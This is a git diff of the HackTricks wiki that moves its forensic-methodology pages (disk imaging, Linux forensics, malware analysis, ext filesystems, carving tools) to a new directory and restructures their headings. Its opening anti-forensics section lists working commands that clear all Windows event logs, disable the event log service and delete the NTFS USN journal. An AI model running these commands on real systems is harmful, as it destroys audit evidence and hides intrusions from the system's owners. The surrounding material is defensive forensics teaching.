* You can also use tools like [**Eraser**](https://eraser.heidi.ie)
-## Delete Windows event logs
+### Delete Windows event logs
* Windows + R --> eventvwr.msc --> Expand "Windows Logs" --> Right click each category and select "Clear Log"
* `for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"`
* `Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }`
-## Disable Windows event logs
+### Disable Windows event logs
* `reg add 'HKLM\SYSTEM\CurrentControlSet\Services\eventlog' /v Start /t REG_DWORD /d 4 /f`
* Inside the services section disable the service "Windows Event Log"
* `WEvtUtil.exec clear-log` or `WEvtUtil.exe cl`
-## Disable $UsnJrnl
+### Disable $UsnJrnl
* `fsutil usn deletejournal /d c:`
-
Support HackTricks and get benefits!
@@ -186,5 +184,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/docker-forensics.md b/forensics/basic-forensic-methodology/docker-forensics.md
similarity index 100%
rename from generic-methodologies-and-resources/basic-forensic-methodology/docker-forensics.md
rename to forensics/basic-forensic-methodology/docker-forensics.md
diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/file-integrity-monitoring.md b/forensics/basic-forensic-methodology/file-integrity-monitoring.md
similarity index 97%
rename from generic-methodologies-and-resources/basic-forensic-methodology/file-integrity-monitoring.md
rename to forensics/basic-forensic-methodology/file-integrity-monitoring.md
index 51e2d5d24..f58ec9dba 100644
--- a/generic-methodologies-and-resources/basic-forensic-methodology/file-integrity-monitoring.md
+++ b/forensics/basic-forensic-methodology/file-integrity-monitoring.md
@@ -1,4 +1,4 @@
-
+# Baseline Monitoring
@@ -16,15 +16,14 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-# Baseline
+## Baseline
A baseline consist on take a snapshot of certain part of a system in oder to c**ompare it with a future status to highlight changes**.
For example, you can calculate and store the hash of each file of the filesystem to .be able to find out which files were modified.\
-This can also be done with the user accounts created, processes running, services running and any other thing that shouldn't change much, or at all.
+This can also be done with the user accounts created, processes running, services running and any other thing that shouldn't change much, or at all.
-## File Integrity Monitoring
+### File Integrity Monitoring
File integrity monitoring is one of the most powerful techniques used to secure IT infrastructures and business data against a wide variety of both known and unknown threats.\
The goal is to generate a **baseline of all the files** that you want monitor and then **periodically** **check** those files for possible **changes** (in the content, attribute, metadata...).
@@ -33,16 +32,15 @@ The goal is to generate a **baseline of all the files** that you want monitor an
2\. **Real-time change notification**, which is typically implemented within or as an extension to the kernel of the operating system that will flag when a file is accessed or modified.
-## Tools
+### Tools
* [https://github.com/topics/file-integrity-monitoring](https://github.com/topics/file-integrity-monitoring)
* [https://www.solarwinds.com/security-event-manager/use-cases/file-integrity-monitoring-software](https://www.solarwinds.com/security-event-manager/use-cases/file-integrity-monitoring-software)
-# References
+## References
* [https://cybersecurity.att.com/blogs/security-essentials/what-is-file-integrity-monitoring-and-why-you-need-it](https://cybersecurity.att.com/blogs/security-essentials/what-is-file-integrity-monitoring-and-why-you-need-it)
-
Support HackTricks and get benefits!
@@ -58,5 +56,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/image-adquisition-and-mount.md b/forensics/basic-forensic-methodology/image-adquisition-and-mount.md
similarity index 97%
rename from generic-methodologies-and-resources/basic-forensic-methodology/image-adquisition-and-mount.md
rename to forensics/basic-forensic-methodology/image-adquisition-and-mount.md
index 66ec7bb35..0a4ac488b 100644
--- a/generic-methodologies-and-resources/basic-forensic-methodology/image-adquisition-and-mount.md
+++ b/forensics/basic-forensic-methodology/image-adquisition-and-mount.md
@@ -1,4 +1,4 @@
-
+# Image Adquisition & Mount
@@ -16,17 +16,16 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+## Acquisition
-# Acquisition
-
-## DD
+### DD
```bash
#This will generate a raw copy of the disk
dd if=/dev/sdb of=disk.img
```
-## dcfldd
+### dcfldd
```bash
#Raw copy with hashes along the way (more secur s it checks hashes while it's copying the data)
@@ -34,7 +33,7 @@ dcfldd if= of= bs=512 hash= hashwindow=
Support HackTricks and get benefits!
@@ -142,5 +139,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/linux-forensics.md b/forensics/basic-forensic-methodology/linux-forensics.md
similarity index 96%
rename from generic-methodologies-and-resources/basic-forensic-methodology/linux-forensics.md
rename to forensics/basic-forensic-methodology/linux-forensics.md
index 0b5fb1ae0..393fb2d7d 100644
--- a/generic-methodologies-and-resources/basic-forensic-methodology/linux-forensics.md
+++ b/forensics/basic-forensic-methodology/linux-forensics.md
@@ -1,4 +1,4 @@
-
+# Linux Forensics
@@ -16,10 +16,9 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+## Initial Information Gathering
-# Initial Information Gathering
-
-## Basic Information
+### Basic Information
First of all, it's recommended to have some **USB** with **good known binaries and libraries on it** (you can just get a ubuntu and copy the folders _/bin_, _/sbin_, _/lib,_ and _/lib64_), then mount the USN, and modify the env variables to use those binaries:
@@ -48,7 +47,7 @@ cat /etc/shadow #Unexpected data?
find /directory -type f -mtime -1 -print #Find modified files during the last minute in the directory
```
-### Suspicious information
+#### Suspicious information
While obtaining the basic information you should check for weird things like:
@@ -56,7 +55,7 @@ While obtaining the basic information you should check for weird things like:
* Check **registered logins** of users without a shell inside `/etc/passwd`
* Check for **password hashes** inside `/etc/shadow` for users without a shell
-## Memory Dump
+### Memory Dump
In order to obtain the memory of the running system it's recommended to use [**LiME**](https://github.com/504ensicsLabs/LiME).\
In order to **compile** it you need to use the **exact same kernel** the victim machine is using.
@@ -81,14 +80,14 @@ LiME supports 3 **formats**:
LiME can also be use to **send the dump via network** instead of storing it on the system using something like: `path=tcp:4444`
-## Disk Imaging
+### Disk Imaging
-### Shutting down
+#### Shutting down
First of all you will need to **shutdown the system**. This isn't always an option as some times system will be a production server that the company cannot afford to shutdown.\
There are **2 ways** of shutting down the system, a **normal shutdown** and a **"plug the plug" shutdown**. The first one will allow the **processes to terminate as usual** and the **filesystem** to be **synchronized**, but I will also allow the possible **malware** to **destroy evidences**. The "pull the plug" approach may carry **some information loss** (as we have already took an image of the memory not much info is going to be lost) and the **malware won't have any opportunity** to do anything about it. Therefore, if you **suspect** that there may be a **malware**, just execute the **`sync`** **command** on the system and pull the plug.
-### Taking an image of the disk
+#### Taking an image of the disk
It's important to note that **before connecting to your computer anything related to the case**, you need to be sure that it's going to be **mounted as read only** to avoid modifying the any information.
@@ -101,7 +100,7 @@ dcfldd if= of= bs=512 hash= hashwindow=)
-# Inspect AutoStart locations
+## Inspect AutoStart locations
-## Scheduled Tasks
+### Scheduled Tasks
```bash
cat /var/spool/cron/crontabs/* \
@@ -235,7 +234,7 @@ cat /var/spool/cron/crontabs/* \
ls -l /usr/lib/cron/tabs/ /Library/LaunchAgents/ /Library/LaunchDaemons/ ~/Library/LaunchAgents/
```
-## Services
+### Services
It is extremely common for malware to entrench itself as a new, unauthorized service. Linux has a number of scripts that are used to start services as the computer boots. The initialization startup script _**/etc/inittab**_ calls other scripts such as rc.sysinit and various startup scripts under the _**/etc/rc.d/**_ directory, or _**/etc/rc.boot/**_ in some older versions. On other versions of Linux, such as Debian, startup scripts are stored in the _**/etc/init.d/**_ directory. In addition, some common services are enabled in _**/etc/inetd.conf**_ or _**/etc/xinetd/**_ depending on the version of Linux. Digital investigators should inspect each of these startup scripts for anomalous entries.
@@ -248,11 +247,11 @@ It is extremely common for malware to entrench itself as a new, unauthorized ser
* _**/etc/systemd/system**_
* _**/etc/systemd/system/multi-user.target.wants/**_
-## Kernel Modules
+### Kernel Modules
On Linux systems, kernel modules are commonly used as rootkit components to malware packages. Kernel modules are loaded when the system boots up based on the configuration information in the `/lib/modules/'uname -r'` and `/etc/modprobe.d` directories, and the `/etc/modprobe` or `/etc/modprobe.conf` file. These areas should be inspected for items that are related to malware.
-## Other AutoStart Locations
+### Other AutoStart Locations
There are several configuration files that Linux uses to automatically launch an executable when a user logs into the system that may contain traces of malware.
@@ -260,11 +259,11 @@ There are several configuration files that Linux uses to automatically launch an
* _**ā¼/.bashrc**_ , _**ā¼/.bash\_profile**_ , _**\~/.profile**_ , _**ā¼/.config/autostart**_ are executed when the specific user logs in.
* _**/etc/rc.local**_ It is traditionally executed after all the normal system services are started, at the end of the process of switching to a multiuser runlevel.
-# Examine Logs
+## Examine Logs
Look in all available log files on the compromised system for traces of malicious execution and associated activities such as creation of a new service.
-## Pure Logs
+### Pure Logs
**Logon** events recorded in the system and security logs, including logons via the network, can reveal that **malware** or an **intruder gained access** to a compromised system via a given account at a specific time. Other events around the time of a malware infection can be captured in system logs, including the **creation** of a **new** **service** or new accounts around the time of an incident.\
Interesting system logons:
@@ -291,7 +290,7 @@ Interesting system logons:
Linux system logs and audit subsystems may be disabled or deleted in an intrusion or malware incident. In fact, because logs on Linux systems generally contain some of the most useful information about malicious activities, intruders routinely delete them. Therefore, when examining available log files, it is important to look for gaps or out of order entries that might be an indication of deletion or tampering.
{% endhint %}
-## Command History
+### Command History
Many Linux systems are configured to maintain a command history for each user account:
@@ -300,7 +299,7 @@ Many Linux systems are configured to maintain a command history for each user ac
* \~/.sh\_history
* \~/.\*\_history
-## Logins
+### Logins
Using the command `last -Faiwx` it's possible to get the list of users that have logged in.\
It's recommended to check if those logins make sense:
@@ -312,7 +311,7 @@ This is important as **attackers** some times may copy `/bin/bash` inside `/bin/
Note that you can also **take a look to this information reading the logs**.
-## Application Traces
+### Application Traces
* **SSH**: Connections to systems made using SSH to and from a compromised system result in entries being made in files for each user account (_**ā¼/.ssh/authorized\_keys**_ and _**ā¼/.ssh/known\_keys**_). These entries can reveal the hostname or IP address of the remote hosts.
* **Gnome Desktop**: User accounts may have a _**ā¼/.recently-used.xbel**_ file that contains information about files that were recently accessed using applications running in the Gnome desktop.
@@ -321,20 +320,20 @@ Note that you can also **take a look to this information reading the logs**.
* **MySQL**: User accounts may have a _**ā¼/.mysql\_history**_ file that contains queries executed using MySQL.
* **Less**: User accounts may have a _**ā¼/.lesshst**_ file that contains details about the use of less, including search string history and shell commands executed via less
-## USB Logs
+### USB Logs
[**usbrip**](https://github.com/snovvcrash/usbrip) is a small piece of software written in pure Python 3 which parses Linux log files (`/var/log/syslog*` or `/var/log/messages*` depending on the distro) for constructing USB event history tables.
It is interesting to **know all the USBs that have been used** and it will be more useful if you have an authorized list of USB to find "violation events" (the use of USBs that aren't inside that list).
-## Installation
+### Installation
```
pip3 install usbrip
usbrip ids download #Downloal USB ID database
```
-## Examples
+### Examples
```
usbrip events history #Get USB history of your curent linux machine
@@ -346,13 +345,13 @@ usbrip ids search --pid 0002 --vid 0e0f #Search for pid AND vid
More examples and info inside the github: [https://github.com/snovvcrash/usbrip](https://github.com/snovvcrash/usbrip)
-# Review User Accounts and Logon Activities
+## Review User Accounts and Logon Activities
Examine the _**/etc/passwd**_, _**/etc/shadow**_ and **security logs** for unusual names or accounts created and/or used in close proximity to known unauthorized events. Also check possible sudo brute-force attacks.\
Moreover, check files like _**/etc/sudoers**_ and _**/etc/groups**_ for unexpected privileges given to users.\
Finally look for accounts with **no passwords** or **easily guessed** passwords.
-# Examine File System
+## Examine File System
File system data structures can provide substantial amounts of **information** related to a **malware** incident, including the **timing** of events and the actual **content** of **malware**.\
**Malware** is increasingly being designed to **thwart file system analysis**. Some malware alter date-time stamps on malicious files to make it more difficult to find them with time line analysis. Other malicious code is designed to only store certain information in memory to minimize the amount of data stored in the file system.\
@@ -375,27 +374,27 @@ You can check the inodes of the files inside a folder using `ls -lai /bin |sort
Note that an **attacker** can **modify** the **time** to make **files appear** **legitimate**, but he **cannot** modify the **inode**. If you find that a **file** indicates that it was created and modify at the **same time** of the rest of the files in the same folder, but the **inode** is **unexpectedly bigger**, then the **timestamps of that file were modified**.
{% endhint %}
-# Compare files of different filesystem versions
+## Compare files of different filesystem versions
-### Find added files
+#### Find added files
```bash
git diff --no-index --diff-filter=A _openwrt1.extracted/squashfs-root/ _openwrt2.extracted/squashfs-root/
```
-### Find Modified content
+#### Find Modified content
```bash
git diff --no-index --diff-filter=M _openwrt1.extracted/squashfs-root/ _openwrt2.extracted/squashfs-root/ | grep -E "^\+" | grep -v "Installed-Time"
```
-### Find deleted files
+#### Find deleted files
```bash
git diff --no-index --diff-filter=A _openwrt1.extracted/squashfs-root/ _openwrt2.extracted/squashfs-root/
```
-### Other filters
+#### Other filters
**`-diff-filter=[(A|C|D|M|R|T|U|X|B)ā¦ā[*]]`**
@@ -405,12 +404,11 @@ Also, **these upper-case letters can be downcased to exclude**. E.g. `--diff-fil
Note that not all diffs can feature all types. For instance, diffs from the index to the working tree can never have Added entries (because the set of paths included in the diff is limited by what is in the index). Similarly, copied and renamed entries cannot appear if detection for those types is disabled.
-# References
+## References
* [https://cdn.ttgtmedia.com/rms/security/Malware%20Forensics%20Field%20Guide%20for%20Linux%20Systems\_Ch3.pdf](https://cdn.ttgtmedia.com/rms/security/Malware%20Forensics%20Field%20Guide%20for%20Linux%20Systems\_Ch3.pdf)
* [https://www.plesk.com/blog/featured/linux-logs-explained/](https://www.plesk.com/blog/featured/linux-logs-explained/)
-
Support HackTricks and get benefits!
@@ -426,5 +424,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/malware-analysis.md b/forensics/basic-forensic-methodology/malware-analysis.md
similarity index 94%
rename from generic-methodologies-and-resources/basic-forensic-methodology/malware-analysis.md
rename to forensics/basic-forensic-methodology/malware-analysis.md
index 7c9ba4489..4257db679 100644
--- a/generic-methodologies-and-resources/basic-forensic-methodology/malware-analysis.md
+++ b/forensics/basic-forensic-methodology/malware-analysis.md
@@ -1,4 +1,4 @@
-
+# Malware Analysis
@@ -16,29 +16,28 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-# Forensics CheatSheets
+## Forensics CheatSheets
[https://www.jaiminton.com/cheatsheet/DFIR/#](https://www.jaiminton.com/cheatsheet/DFIR/#)
-# Online Services
+## Online Services
* [VirusTotal](https://www.virustotal.com/gui/home/upload)
* [HybridAnalysis](https://www.hybrid-analysis.com)
* [Koodous](https://koodous.com)
* [Intezer](https://analyze.intezer.com)
-# Offline Antivirus and Detection Tools
+## Offline Antivirus and Detection Tools
-## Yara
+### Yara
-### Install
+#### Install
```bash
sudo apt-get install -y yara
```
-### Prepare rules
+#### Prepare rules
Use this script to download and merge all the yara malware rules from github: [https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9](https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9)\
Create the _**rules**_ directory and execute it. This will create a file called _**malware\_rules.yar**_ which contains all the yara rules for malware.
@@ -49,14 +48,14 @@ mkdir rules
python malware_yara_rules.py
```
-### Scan
+#### Scan
```bash
yara -w malware_rules.yar image #Scan 1 file
yara -w malware_rules.yar folder #Scan hole fodler
```
-### YaraGen: Check for malware and Create rules
+#### YaraGen: Check for malware and Create rules
You can use the tool [**YaraGen**](https://github.com/Neo23x0/yarGen) to generate yara rules from a binary. Checkout these tutorials: [**Part 1**](https://www.nextron-systems.com/2015/02/16/write-simple-sound-yara-rules/), [**Part 2**](https://www.nextron-systems.com/2015/10/17/how-to-write-simple-but-sound-yara-rules-part-2/), [**Part 3**](https://www.nextron-systems.com/2016/04/15/how-to-write-simple-but-sound-yara-rules-part-3/)
@@ -65,15 +64,15 @@ You can use the tool [**YaraGen**](https://github.com/Neo23x0/yarGen) to generat
python3.exe yarGen.py --excludegood -m ../../mals/
```
-## ClamAV
+### ClamAV
-### Install
+#### Install
```
sudo apt-get install -y clamav
```
-### Scan
+#### Scan
```bash
sudo freshclam #Update rules
@@ -81,7 +80,7 @@ clamscan filepath #Scan 1 file
clamscan folderpath #Scan the hole folder
```
-## IOCs
+### IOCs
IOC means Indicator Of Compromise. An IOC is a set of **conditions that identifies** some potentially unwanted software or a confirmed **malware**. Blue Teams use this kind of definitions to **search for this kind of malicious files** in their **systems** and **networks**.\
To share these definitions is very useful as when a malware is identified in a computer and an IOC for that malware is created, other Blue Teams can use it to identify the malware faster.
@@ -89,7 +88,7 @@ To share these definitions is very useful as when a malware is identified in a c
A tool to create or modify IOCs is [**IOC Editor**](https://www.fireeye.com/services/freeware/ioc-editor.html)**.**\
You can use tools such as [**Redline**](https://www.fireeye.com/services/freeware/redline.html) to **search for defined IOCs in a device**.
-## Loki
+### Loki
[**Loki**](https://github.com/Neo23x0/Loki) is a scanner for Simple Indicators of Compromise.\
Detection is based on four detection methods:
@@ -108,11 +107,11 @@ Detection is based on four detection methods:
Compares process connection endpoints with C2 IOCs (new since version v.10)
```
-## Linux Malware Detect
+### Linux Malware Detect
[**Linux Malware Detect (LMD)**](https://www.rfxn.com/projects/linux-malware-detect/) is a malware scanner for Linux released under the GNU GPLv2 license, that is designed around the threats faced in shared hosted environments. It uses threat data from network edge intrusion detection systems to extract malware that is actively being used in attacks and generates signatures for detection. In addition, threat data is also derived from user submissions with the LMD checkout feature and from malware community resources.
-## rkhunter
+### rkhunter
Tools like [**rkhunter**](http://rkhunter.sourceforge.net) can be used to check the filesystem for possible **rootkits** and malware.
@@ -120,19 +119,19 @@ Tools like [**rkhunter**](http://rkhunter.sourceforge.net) can be used to check
sudo ./rkhunter --check -r / -l /tmp/rkhunter.log [--report-warnings-only] [--skip-keypress]
```
-## PEpper
+### PEpper
[PEpper ](https://github.com/Th3Hurrican3/PEpper)checks some basic stuff inside the executable (binary data, entropy, URLs and IPs, some yara rules).
-## NeoPI
+### NeoPI
[**NeoPI** ](https://github.com/CiscoCXSecurity/NeoPI)is a Python script that uses a variety of **statistical methods** to detect **obfuscated** and **encrypted** content within text/script files. The intended purpose of NeoPI is to aid in the **detection of hidden web shell code**.
-## **php-malware-finder**
+### **php-malware-finder**
[**PHP-malware-finder**](https://github.com/nbs-system/php-malware-finder) does its very best to detect **obfuscated**/**dodgy code** as well as files using **PHP** functions often used in **malwares**/webshells.
-## Apple Binary Signatures
+### Apple Binary Signatures
When checking some **malware sample** you should always **check the signature** of the binary as the **developer** that signed it may be already **related** with **malware.**
@@ -147,21 +146,20 @@ codesign --verify --verbose /Applications/Safari.app
spctl --assess --verbose /Applications/Safari.app
```
-# Detection Techniques
+## Detection Techniques
-## File Stacking
+### File Stacking
If you know that some folder containing the **files** of a web server was **last updated in some date**. **Check** the **date** all the **files** in the **web server were created and modified** and if any date is **suspicious**, check that file.
-## Baselines
+### Baselines
If the files of a folder s**houldn't have been modified**, you can calculate the **hash** of the **original files** of the folder and **compare** them with the **current** ones. Anything modified will be **suspicious**.
-## Statistical Analysis
+### Statistical Analysis
When the information is saved in logs you can **check statistics like how many times each file of a web server was accessed as a webshell might be one of the most**.
-
Support HackTricks and get benefits!
@@ -177,5 +175,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/README.md b/forensics/basic-forensic-methodology/memory-dump-analysis/README.md
similarity index 97%
rename from generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/README.md
rename to forensics/basic-forensic-methodology/memory-dump-analysis/README.md
index 3eea38763..167da0f7e 100644
--- a/generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/README.md
+++ b/forensics/basic-forensic-methodology/memory-dump-analysis/README.md
@@ -1,4 +1,4 @@
-
+# Memory dump analysis
@@ -16,15 +16,14 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
Start **searching** for **malware** inside the pcap. Use the **tools** mentioned in [**Malware Analysis**](../malware-analysis.md).
-# [Volatility](volatility-examples.md)
+## [Volatility](volatility-examples.md)
The premiere open-source framework for memory dump analysis is [Volatility](volatility-examples.md). Volatility is a Python script for parsing memory dumps that were gathered with an external tool (or a VMware memory image gathered by pausing the VM). So, given the memory dump file and the relevant "profile" (the OS from which the dump was gathered), Volatility can start identifying the structures in the data: running processes, passwords, etc. It is also extensible using plugins for extracting various types of artifact.\
From: [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/)
-# Mini dump crash report
+## Mini dump crash report
When the dump is small (just some KB, maybe a few MB) the it's probably a mini dump crash report and not a memory dump.
@@ -44,10 +43,6 @@ Anyway Visual Studio isn't the best tool to perform a analysis in depth of the d
You should **open** it using **IDA** or **Radare** to inspection it in **depth**.
-
-
-
-
Support HackTricks and get benefits!
@@ -63,5 +58,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-examples.md b/forensics/basic-forensic-methodology/memory-dump-analysis/volatility-examples.md
similarity index 100%
rename from generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-examples.md
rename to forensics/basic-forensic-methodology/memory-dump-analysis/volatility-examples.md
diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/README.md b/forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md
similarity index 100%
rename from generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/README.md
rename to forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md
diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/ext.md b/forensics/basic-forensic-methodology/partitions-file-systems-carving/ext.md
similarity index 94%
rename from generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/ext.md
rename to forensics/basic-forensic-methodology/partitions-file-systems-carving/ext.md
index 1073b1b2d..cf6eed431 100644
--- a/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/ext.md
+++ b/forensics/basic-forensic-methodology/partitions-file-systems-carving/ext.md
@@ -1,4 +1,4 @@
-
+# EXT
@@ -16,8 +16,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-# Ext - Extended Filesystem
+## Ext - Extended Filesystem
**Ext2** is the most common filesystem for **not journaling** partitions (**partitions that don't change much**) like the boot partition. **Ext3/4** are **journaling** and are used usually for the **rest partitions**.
@@ -34,7 +33,7 @@ Every block group contains the following pieces of information:
![](<../../../.gitbook/assets/image (406).png>)
-## Ext Optional Features
+### Ext Optional Features
**Features affect where** the data is located, **how** the data is stored in inodes and some of them might supply **additional metadata** for analysis, therefore features are important in Ext.
@@ -52,7 +51,7 @@ Suspected attacker might have non-standard extensions
**Any utility** that reads the **superblock** will be able to indicate the **features** of a **Ext filesystem**, but you could also use `file -sL /dev/sd*`
-## Superblock
+### Superblock
The superblock is the first 1024 bytes from the start, it's repeated in the first block of each group and contains:
@@ -78,7 +77,7 @@ fsstat -o /pat/to/filesystem-file.ext
You can also use the free gui application: [https://www.disk-editor.org/index.html](https://www.disk-editor.org/index.html)\
Or you can also use **python** to obtain the superblock information: [https://pypi.org/project/superblock/](https://pypi.org/project/superblock/)
-## inodes
+### inodes
The **inodes** contain the list of **blocks** that **contains** the actual **data** of a **file**.\
If the file is big, and inode **may contain pointers** to **other inodes** that points to the blocks/more inodes containing the file data.
@@ -169,24 +168,24 @@ icat -o /path/to/image.ext 657103 #Cat the file
File Mode
-| Number | Description |
-| ------ | --------------------------------------------------------------------------------------------------- |
-| **15** | **Reg/Slink-13/Socket-14** |
-| **14** | **Directory/Block Bit 13** |
-| **13** | **Char Device/Block Bit 14** |
-| **12** | **FIFO** |
-| 11 | Set UID |
-| 10 | Set GID |
-| 9 | Sticky Bit (without it, anyone with Write & exec perms on a directory can delete and rename files) |
-| 8 | Owner Read |
-| 7 | Owner Write |
-| 6 | Owner Exec |
-| 5 | Group Read |
-| 4 | Group Write |
-| 3 | Group Exec |
-| 2 | Others Read |
-| 1 | Others Write |
-| 0 | Others Exec |
+| Number | Description |
+| ------ | -------------------------------------------------------------------------------------------------- |
+| **15** | **Reg/Slink-13/Socket-14** |
+| **14** | **Directory/Block Bit 13** |
+| **13** | **Char Device/Block Bit 14** |
+| **12** | **FIFO** |
+| 11 | Set UID |
+| 10 | Set GID |
+| 9 | Sticky Bit (without it, anyone with Write & exec perms on a directory can delete and rename files) |
+| 8 | Owner Read |
+| 7 | Owner Write |
+| 6 | Owner Exec |
+| 5 | Group Read |
+| 4 | Group Write |
+| 3 | Group Exec |
+| 2 | Others Read |
+| 1 | Others Write |
+| 0 | Others Exec |
The bold bits (12, 13, 14, 15) indicate the type of file the file is (a directory, socket...) only one of the options in bold may exit.
@@ -231,14 +230,13 @@ getfattr file.txt #Get extended attribute names of a file
getdattr -n 'user.secret' file.txt #Get extended attribute called "user.secret"
```
-## Filesystem View
+### Filesystem View
In order to see the contents of the file system you can **use the free tool**: [https://www.disk-editor.org/index.html](https://www.disk-editor.org/index.html)\
Or you can mount it in your linux using `mount` command.
[https://piazza.com/class\_profile/get\_resource/il71xfllx3l16f/inz4wsb2m0w2oz#:\~:text=The%20Ext2%20file%20system%20divides,lower%20average%20disk%20seek%20time.](https://piazza.com/class\_profile/get\_resource/il71xfllx3l16f/inz4wsb2m0w2oz#:\~:text=The%20Ext2%20file%20system%20divides,lower%20average%20disk%20seek%20time.)
-
Support HackTricks and get benefits!
@@ -254,5 +252,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md b/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md
similarity index 95%
rename from generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md
rename to forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md
index 965d216df..5f2a3ddab 100644
--- a/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md
+++ b/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md
@@ -1,4 +1,4 @@
-
+# File/Data Carving & Recovery Tools
@@ -16,16 +16,15 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-# Carving & Recovery tools
+## Carving & Recovery tools
More tools in [https://github.com/Claudio-C/awesome-datarecovery](https://github.com/Claudio-C/awesome-datarecovery)
-## Autopsy
+### Autopsy
The most common tool used in forensics to extract files from images is [**Autopsy**](https://www.autopsy.com/download/). Download it, install it and make it ingest the file to find "hidden" files. Note that Autopsy is built to support disk images and other kind of images, but not simple files.
-## Binwalk
+### Binwalk
**Binwalk** is a tool for searching binary files like images and audio files for embedded files and data.\
It can be installed with `apt` however the [source](https://github.com/ReFirmLabs/binwalk) can be found on github.\
@@ -38,7 +37,7 @@ binwalk -e file #Displays and extracts some files from the given file
binwalk --dd ".*" file #Displays and extracts all files from the given file
```
-## Foremost
+### Foremost
Another common tool to find hidden files is **foremost**. You can find the configuration file of foremost in `/etc/foremost.conf`. If you just want to search for some specific files uncomment them. If you don't uncomment anything foremost will search for it's default configured file types.
@@ -48,7 +47,7 @@ foremost -v -i file.img -o output
#Discovered files will appear inside the folder "output"
```
-## **Scalpel**
+### **Scalpel**
**Scalpel** is another tool that can be use to find and extract **files embedded in a file**. In this case you will need to uncomment from the configuration file (_/etc/scalpel/scalpel.conf_) the file types you want it to extract.
@@ -57,7 +56,7 @@ sudo apt-get install scalpel
scalpel file.img -o output
```
-## Bulk Extractor
+### Bulk Extractor
This tool comes inside kali but you can find it here: [https://github.com/simsong/bulk\_extractor](https://github.com/simsong/bulk\_extractor)
@@ -69,7 +68,7 @@ bulk_extractor memory.img -o out_folder
Navigate through **all the information** that the tool has gathered (passwords?), **analyse** the **packets** (read[ **Pcaps analysis**](../pcap-inspection/)), search for **weird domains** (domains related to **malware** or **non-existent**).
-## PhotoRec
+### PhotoRec
You can find it in [https://www.cgsecurity.org/wiki/TestDisk\_Download](https://www.cgsecurity.org/wiki/TestDisk\_Download)
@@ -77,11 +76,11 @@ It comes with GUI and CLI version. You can select the **file-types** you want Ph
![](<../../../.gitbook/assets/image (524).png>)
-## binvis
+### binvis
Check the [code](https://code.google.com/archive/p/binvis/) and the [web page tool](https://binvis.io/#/).
-### Features of BinVis
+#### Features of BinVis
* visual and active **structure viewer**
* multiple plots for different focus points
@@ -94,20 +93,19 @@ Check the [code](https://code.google.com/archive/p/binvis/) and the [web page to
BinVis is a great **start-point to get familiar with an unknown target** in a black-boxing scenario.
-# Specific Data Carving Tools
+## Specific Data Carving Tools
-## FindAES
+### FindAES
Searches for AES keys by searching for their key schedules. Able to find 128. 192, and 256 bit keys, such as those used by TrueCrypt and BitLocker.
Download [here](https://sourceforge.net/projects/findaes/).
-# Complementary tools
+## Complementary tools
You can use [**viu** ](https://github.com/atanunq/viu)to see images form the terminal.\
